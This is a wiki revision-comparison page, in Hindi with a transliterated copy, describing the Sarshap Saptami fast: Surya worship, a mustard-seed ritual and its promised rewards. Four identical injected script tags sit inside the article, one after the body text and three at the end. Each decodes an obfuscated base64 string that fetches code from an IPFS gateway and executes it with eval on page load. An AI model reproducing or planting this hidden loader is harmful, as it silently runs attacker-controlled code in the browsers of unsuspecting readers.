Difference between revisions of "सर्षप सप्तमी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "==सम्बंधित लिंक==" to "==संबंधित लेख==")
m (Text replace - ")</ref" to "</ref")
 
(3 intermediate revisions by 2 users not shown)
Line 1: Line 1:
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।  
+
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।  
 
*सर्षपसप्तमी व्रत तिथिव्रत है।
 
*सर्षपसप्तमी व्रत तिथिव्रत है।
 
*सर्षपसप्तमी व्रत में [[देवता]] [[सूर्य देव|सूर्य]] की पूजा की जाती है।
 
*सर्षपसप्तमी व्रत में [[देवता]] [[सूर्य देव|सूर्य]] की पूजा की जाती है।
 
*सात [[सप्तमी|सप्तमियों]] पर कर्ता सूर्याभिमुख हो अपनी हथेली पर पंचगव्य या अन्य द्रव रखता है तथा [[प्रथम]] से सातवीं सप्तमी तक क्रम से एक से आरम्भ कर सात [[सरसों]] रखकर उन्हें देखता है और अपने मन में कोई कामना करता है तथा सरसों से सम्बन्धि मंत्र का उच्चारण कर बिना दाँत मिलाये पी जाता है।
 
*सात [[सप्तमी|सप्तमियों]] पर कर्ता सूर्याभिमुख हो अपनी हथेली पर पंचगव्य या अन्य द्रव रखता है तथा [[प्रथम]] से सातवीं सप्तमी तक क्रम से एक से आरम्भ कर सात [[सरसों]] रखकर उन्हें देखता है और अपने मन में कोई कामना करता है तथा सरसों से सम्बन्धि मंत्र का उच्चारण कर बिना दाँत मिलाये पी जाता है।
 
*सर्षपसप्तमी व्रत में [[होम]] एवं [[जप]] कराना चाहिए।
 
*सर्षपसप्तमी व्रत में [[होम]] एवं [[जप]] कराना चाहिए।
*सर्षपसप्तमी व्रत से [[पुत्र|पुत्रों]], [[धन]] एवं [[कामना|कामनाओं]] की प्राप्ति होती है।<ref>हेमाद्रि (व्रत खण्ड 1, 686-687, [[भविष्य पुराण]] से उद्धरण), कृत्यकल्पतरु (व्रत खण्ड 187-188)</ref>
+
*सर्षपसप्तमी व्रत से [[पुत्र|पुत्रों]], [[धन]] एवं [[कामना|कामनाओं]] की प्राप्ति होती है।<ref>हेमाद्रि (व्रत खण्ड 1, 686-687, [[भविष्य पुराण]] से उद्धरण), कृत्यकल्पतरु (व्रत खण्ड 187-188</ref>
  
{{लेख प्रगति
+
{{संदर्भ ग्रंथ}}
|आधार=आधार1
 
|प्रारम्भिक=
 
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>

Latest revision as of 12:47, 27 July 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • sarshapasaptami vrat tithivrat hai.
  • sarshapasaptami vrat mean devata soory ki pooja ki jati hai.
  • sat saptamiyoan par karta sooryabhimukh ho apani hatheli par panchagavy ya any drav rakhata hai tatha pratham se satavian saptami tak kram se ek se arambh kar sat sarasoan rakhakar unhean dekhata hai aur apane man mean koee kamana karata hai tatha sarasoan se sambandhi mantr ka uchcharan kar bina daant milaye pi jata hai.
  • sarshapasaptami vrat mean hom evan jap karana chahie.
  • sarshapasaptami vrat se putroan, dhan evan kamanaoan ki prapti hoti hai.[1]

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. hemadri (vrat khand 1, 686-687, bhavishy puran se uddharan), krityakalpataru (vrat khand 187-188

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>